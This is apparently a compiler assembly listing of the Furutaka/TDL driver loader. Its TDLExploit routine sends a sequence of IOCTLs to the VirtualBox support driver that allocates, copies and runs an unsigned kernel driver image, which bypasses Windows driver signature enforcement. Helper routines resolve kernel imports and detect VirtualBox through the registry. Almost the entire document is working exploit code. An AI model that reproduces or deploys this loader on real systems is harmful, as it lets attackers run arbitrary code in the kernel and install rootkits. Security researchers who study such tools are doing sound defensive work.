mov rcx, r10
mov DWORD PTR [rsp+40], edx
lea rax, QWORD PTR Cookie$[rsp]
mov edx, 2261508 ; 00228204H
mov QWORD PTR [rsp+32], rax
mov DWORD PTR Cookie$[rsp], 1769107316 ; 69726f74H
mov DWORD PTR Cookie$[rsp+8], r9d
mov QWORD PTR Cookie$[rsp+16], 1107296322 ; 42000042H
mov DWORD PTR Cookie$[rsp+40], r13d
mov DWORD PTR Cookie$[rsp+44], 458754 ; 00070002H
movdqu XMMWORD PTR Cookie$[rsp+24], xmm0
call QWORD PTR __imp_DeviceIoControl
test eax, eax
jne SHORT $LN4@TDLExploit
; Line 186
lea rcx, OFFSET FLAT:??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
$LN24@TDLExploit:
; Line 301
mov edx, 1
$LN23@TDLExploit:
call cuiPrintTextW
jmp $LN3@TDLExploit
$LN4@TDLExploit:
; Line 198
movsd xmm0, QWORD PTR ??_C@_08EFILHJLF@furutaka@
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
lea rdi, QWORD PTR OpenLdr$[rbp-256]
xor eax, eax
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 200
mov QWORD PTR [rsp+56], r13
lea r8, QWORD PTR OpenLdr$[rbp-256]
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
lea edx, QWORD PTR [rax+64]
mov ecx, edx
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 200
mov r9d, edx
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 191
mov eax, DWORD PTR Cookie$[rsp+24]
; Line 194
lea ecx, QWORD PTR [rdx-24]
mov DWORD PTR OpenLdr$[rbp-256], eax
mov eax, DWORD PTR Cookie$[rsp+28]
mov DWORD PTR OpenLdr$[rbp-252], eax
; Line 198
mov al, BYTE PTR ??_C@_08EFILHJLF@furutaka@+8
mov BYTE PTR OpenLdr$[rbp-220], al
; Line 200
lea rax, QWORD PTR bytesIO$[rbp-256]
mov QWORD PTR [rsp+48], rax
lea rax, QWORD PTR OpenLdr$[rbp-256]
mov DWORD PTR [rsp+40], ecx
mov DWORD PTR OpenLdr$[rbp-248], edx
mov edx, 2261524 ; 00228214H
mov DWORD PTR OpenLdr$[rbp-244], ecx
mov rcx, QWORD PTR g_hVBox
mov QWORD PTR [rsp+32], rax
mov QWORD PTR OpenLdr$[rbp-240], 1107296322 ; 42000042H
mov DWORD PTR OpenLdr$[rbp-232], esi
movsd QWORD PTR OpenLdr$[rbp-228], xmm0
call QWORD PTR __imp_DeviceIoControl
test eax, eax
jne SHORT $LN5@TDLExploit
; Line 204
lea rcx, OFFSET FLAT:??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
; Line 205
jmp $LN24@TDLExploit
$LN5@TDLExploit:
; Line 208
lea rdx, OFFSET FLAT:??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 209
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rcx, QWORD PTR OpenLdr$[rbp-232]
mov rdx, rax
call u64tohex_w
; Line 210
mov ebx, 1
lea rcx, QWORD PTR text$[rbp-256]
mov edx, ebx
call cuiPrintTextW
; Line 213
mov r14, QWORD PTR OpenLdr$[rbp-232]
; Line 215
lea rax, QWORD PTR [rsi+4096]
; Line 216
mov DWORD PTR [rsp+40], 4
lea r9, QWORD PTR memIO$[rsp]
xor r8d, r8d
mov QWORD PTR memIO$[rsp], rax
lea rdx, QWORD PTR pLoadTask$[rsp]
mov DWORD PTR [rsp+32], 12288 ; 00003000H
or rcx, -1
call QWORD PTR __imp_NtAllocateVirtualMemory
; Line 219
mov rcx, QWORD PTR pLoadTask$[rsp]
test rcx, rcx
je $LN12@TDLExploit
; Line 222
mov eax, DWORD PTR Cookie$[rsp+24]
; Line 235
mov r8, rsi
mov DWORD PTR [rcx], eax
mov rdx, r15
mov rcx, QWORD PTR pLoadTask$[rsp]
mov eax, DWORD PTR Cookie$[rsp+28]
mov DWORD PTR [rcx+4], eax
lea ecx, DWORD PTR [rsi+104]
mov rax, QWORD PTR pLoadTask$[rsp]
mov DWORD PTR [rax+8], ecx
mov rax, QWORD PTR pLoadTask$[rsp]
mov DWORD PTR [rax+12], 24
mov rax, QWORD PTR pLoadTask$[rsp]
mov DWORD PTR [rax+16], 1107296322 ; 42000042H
mov rax, QWORD PTR pLoadTask$[rsp]
mov DWORD PTR [rax+20], r13d
mov rax, QWORD PTR pLoadTask$[rsp]
mov DWORD PTR [rax+80], ebx
mov rax, QWORD PTR pLoadTask$[rsp]
mov QWORD PTR [rax+72], r14
mov rax, QWORD PTR pLoadTask$[rsp]
mov QWORD PTR [rax+40], 106496 ; 0001a000H
mov rax, QWORD PTR pLoadTask$[rsp]
mov QWORD PTR [rax+64], r14
mov rax, QWORD PTR pLoadTask$[rsp]
mov QWORD PTR [rax+56], r14
mov rax, QWORD PTR pLoadTask$[rsp]
mov QWORD PTR [rax+48], r14
mov rcx, QWORD PTR pLoadTask$[rsp]
add rcx, 104 ; 00000068H
call memcpy
; Line 236
mov rax, QWORD PTR pLoadTask$[rsp]
; Line 238
lea r15d, QWORD PTR [rbx+23]
mov QWORD PTR [rsp+56], r13
mov edx, 2261528 ; 00228218H
mov DWORD PTR [rax+100], esi
lea rax, QWORD PTR bytesIO$[rbp-256]
mov r8, QWORD PTR pLoadTask$[rsp]
mov rcx, QWORD PTR g_hVBox
mov QWORD PTR [rsp+48], rax
mov DWORD PTR [rsp+40], r15d
mov r9d, DWORD PTR [r8+8]
mov QWORD PTR [rsp+32], r8
call QWORD PTR __imp_DeviceIoControl
test eax, eax
jne SHORT $LN8@TDLExploit
; Line 242
mov edx, ebx
lea rcx, OFFSET FLAT:??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
; Line 243
jmp $LN23@TDLExploit
$LN8@TDLExploit:
; Line 246
lea rdx, OFFSET FLAT:??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 247
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rdx, rax
mov rcx, r14
call u64tohex_w
; Line 248
lea rdx, OFFSET FLAT:??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@
lea rcx, QWORD PTR text$[rbp-256]
call _strcat_w
; Line 249
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rdx, rax
mov ecx, esi
call ultohex_w
; Line 251
lea rdx, OFFSET FLAT:??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@
lea rcx, QWORD PTR text$[rbp-256]
call _strcat_w
; Line 252
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rdx, rax
lea rcx, QWORD PTR [r14+r12]
call u64tohex_w
; Line 253
mov edx, ebx
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
xor eax, eax
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 265
mov QWORD PTR [rsp+56], r13
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
lea rdi, QWORD PTR vmFast$[rbp-256]
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 265
mov edx, 2261580 ; 0022824cH
lea r8, QWORD PTR vmFast$[rbp-256]
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
lea r12d, QWORD PTR [rax+32]
mov ecx, r12d
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 265
mov r9d, r12d
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 257
mov eax, DWORD PTR Cookie$[rsp+24]
; Line 265
mov rcx, QWORD PTR g_hVBox
mov DWORD PTR vmFast$[rbp-256], eax
mov eax, DWORD PTR Cookie$[rsp+28]
mov DWORD PTR vmFast$[rbp-252], eax
lea rax, QWORD PTR bytesIO$[rbp-256]
mov QWORD PTR [rsp+48], rax
lea rax, QWORD PTR vmFast$[rbp-256]
mov DWORD PTR [rsp+40], r15d
mov QWORD PTR [rsp+32], rax
mov QWORD PTR vmFast$[rbp-240], 1107296322 ; 42000042H
mov DWORD PTR vmFast$[rbp-248], r12d
mov DWORD PTR vmFast$[rbp-244], r15d
mov QWORD PTR vmFast$[rbp-232], 106496 ; 0001a000H
call QWORD PTR __imp_DeviceIoControl
mov edx, ebx
test eax, eax
jne SHORT $LN10@TDLExploit
; Line 269
lea rcx, OFFSET FLAT:??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
; Line 270
jmp $LN23@TDLExploit
$LN10@TDLExploit:
; Line 273
lea rcx, OFFSET FLAT:??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
call cuiPrintTextW
; Line 276
mov edx, ebx
lea rcx, OFFSET FLAT:??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
call cuiPrintTextW
; Line 279
mov rcx, QWORD PTR g_hVBox
lea rax, QWORD PTR bytesIO$[rbp-256]
mov QWORD PTR [rsp+56], r13
xor r9d, r9d
mov QWORD PTR [rsp+48], rax
xor r8d, r8d
lea rax, QWORD PTR paramOut$[rbp-256]
mov DWORD PTR [rsp+40], 8
mov edx, 2261771 ; 0022830bH
mov QWORD PTR [rsp+32], rax
mov QWORD PTR paramOut$[rbp-256], r13
call QWORD PTR __imp_DeviceIoControl
; Line 283
mov edx, ebx
lea rcx, OFFSET FLAT:??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
call cuiPrintTextW
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
xor eax, eax
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 294
mov QWORD PTR [rsp+56], r13
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
mov rcx, r12
lea rdi, QWORD PTR ldrFree$[rbp-256]
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 286
mov eax, DWORD PTR Cookie$[rsp+24]
; Line 294
lea r8, QWORD PTR ldrFree$[rbp-256]
mov rcx, QWORD PTR g_hVBox
mov r9d, r12d
mov DWORD PTR ldrFree$[rbp-256], eax
mov edx, 2261532 ; 0022821cH
mov eax, DWORD PTR Cookie$[rsp+28]
mov DWORD PTR ldrFree$[rbp-252], eax
lea rax, QWORD PTR bytesIO$[rbp-256]
mov QWORD PTR [rsp+48], rax
lea rax, QWORD PTR ldrFree$[rbp-256]
mov DWORD PTR [rsp+40], r15d
mov QWORD PTR [rsp+32], rax
mov DWORD PTR ldrFree$[rbp-248], r12d
mov DWORD PTR ldrFree$[rbp-244], r15d
mov QWORD PTR ldrFree$[rbp-240], 1107296322 ; 42000042H
mov QWORD PTR ldrFree$[rbp-232], r14
call QWORD PTR __imp_DeviceIoControl
$LN3@TDLExploit:
; Line 301
cmp QWORD PTR pLoadTask$[rsp], r13
je SHORT $LN12@TDLExploit
; Line 303
mov r9d, 32768 ; 00008000H
mov QWORD PTR memIO$[rsp], r13
lea r8, QWORD PTR memIO$[rsp]
or rcx, -1
lea rdx, QWORD PTR pLoadTask$[rsp]
call QWORD PTR __imp_NtFreeVirtualMemory
$LN12@TDLExploit:
; Line 306
mov rcx, QWORD PTR g_hVBox
cmp rcx, -1
je SHORT $LN13@TDLExploit
; Line 307
call QWORD PTR __imp_CloseHandle
; Line 308
or QWORD PTR g_hVBox, -1
$LN13@TDLExploit:
; Line 310
lea r11, QWORD PTR [rsp+784]
mov rbx, QWORD PTR [r11+48]
mov rsi, QWORD PTR [r11+56]
mov rdi, QWORD PTR [r11+64]
mov rsp, r11
pop r15
pop r14
pop r13
pop r12
pop rbp
ret 0
TDLExploit ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLResolveKernelImport
_TEXT SEGMENT
Image$ = 80
KernelImage$ = 88
KernelBase$ = 96
TDLResolveKernelImport PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 111
$LN19:
mov QWORD PTR [rsp+8], rbx
mov QWORD PTR [rsp+16], rbp
mov QWORD PTR [rsp+24], rsi
push rdi
push r12
push r13
push r14
push r15
sub rsp, 32 ; 00000020H
mov r12, r8
mov r13, rdx
mov rbx, rcx
; Line 119
call QWORD PTR __imp_RtlImageNtHeader
; Line 121
cmp DWORD PTR [rax+132], 1
jbe SHORT $LN3@TDLResolve
; Line 124
mov edi, DWORD PTR [rax+144]
; Line 125
test rdi, rdi
je SHORT $LN3@TDLResolve
; Line 130
mov eax, DWORD PTR [rdi+rbx]
test eax, eax
jne SHORT $LN8@TDLResolve
; Line 131
mov eax, DWORD PTR [rdi+rbx+16]
$LN8@TDLResolve:
; Line 135
mov esi, eax
add rsi, rbx
xor ebp, ebp
jmp SHORT $LN17@TDLResolve
$LL4@TDLResolve:
; Line 136
mov r15d, DWORD PTR [rdi+rbx+16]
; Line 137
add r15, rbx
test rcx, rcx
js SHORT $LN9@TDLResolve
; Line 139
lea r8, QWORD PTR [rbx+2]
add r8, rcx
; Line 140
jmp SHORT $LN2@TDLResolve
$LN9@TDLResolve:
; Line 142
movzx r8d, cx
$LN2@TDLResolve:
; Line 135
mov rdx, r13
mov rcx, r12
call TDLGetProcAddress
mov QWORD PTR [r15+rbp*8], rax
inc ebp
add rsi, 8
$LN17@TDLResolve:
mov rcx, QWORD PTR [rsi]
test rcx, rcx
jne SHORT $LL4@TDLResolve
$LN3@TDLResolve:
; Line 144
mov rbx, QWORD PTR [rsp+80]
mov rbp, QWORD PTR [rsp+88]
mov rsi, QWORD PTR [rsp+96]
add rsp, 32 ; 00000020H
pop r15
pop r14
pop r13
pop r12
pop rdi
ret 0
TDLResolveKernelImport ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLGetProcAddress
_TEXT SEGMENT
cStr$ = 32
KernelBase$ = 64
KernelImage$ = 72
FunctionName$ = 80
pfn$ = 88
TDLGetProcAddress PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 87
$LN5:
mov QWORD PTR [rsp+8], rbx
push rdi
sub rsp, 48 ; 00000030H
; Line 89
and QWORD PTR pfn$[rsp], 0
mov rbx, rdx
mov rdi, rcx
; Line 91
mov rdx, r8
lea rcx, QWORD PTR cStr$[rsp]
call QWORD PTR __imp_RtlInitString
; Line 92
lea r9, QWORD PTR pfn$[rsp]
xor r8d, r8d
lea rdx, QWORD PTR cStr$[rsp]
mov rcx, rbx
call QWORD PTR __imp_LdrGetProcedureAddress
test eax, eax
jns SHORT $LN2@TDLGetProc
; Line 93
xor eax, eax
jmp SHORT $LN1@TDLGetProc
$LN2@TDLGetProc:
; Line 95
mov rax, QWORD PTR pfn$[rsp]
sub rax, rbx
add rax, rdi
$LN1@TDLGetProc:
; Line 96
mov rbx, QWORD PTR [rsp+64]
add rsp, 48 ; 00000030H
pop rdi
ret 0
TDLGetProcAddress ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLVBoxInstalled
_TEXT SEGMENT
hKey$ = 64
TDLVBoxInstalled PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 57
$LN5:
push rbx
sub rsp, 48 ; 00000030H
; Line 60
and QWORD PTR hKey$[rsp], 0
; Line 62
lea rax, QWORD PTR hKey$[rsp]
mov r9d, 131097 ; 00020019H
mov QWORD PTR [rsp+32], rax
xor r8d, r8d
lea rdx, OFFSET FLAT:??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@
mov rcx, -2147483646 ; ffffffff80000002H
call QWORD PTR __imp_RegOpenKeyExW
; Line 65
mov rcx, QWORD PTR hKey$[rsp]
xor ebx, ebx
test rcx, rcx
setne bl
; Line 67
test rcx, rcx
je SHORT $LN2@TDLVBoxIns
; Line 68
call QWORD PTR __imp_RegCloseKey
$LN2@TDLVBoxIns:
; Line 71
mov eax, ebx
; Line 72
add rsp, 48 ; 00000030H
pop rbx
ret 0
TDLVBoxInstalled ENDP
_TEXT ENDS
END
Reference in New Issue View Git Blame Copy Permalink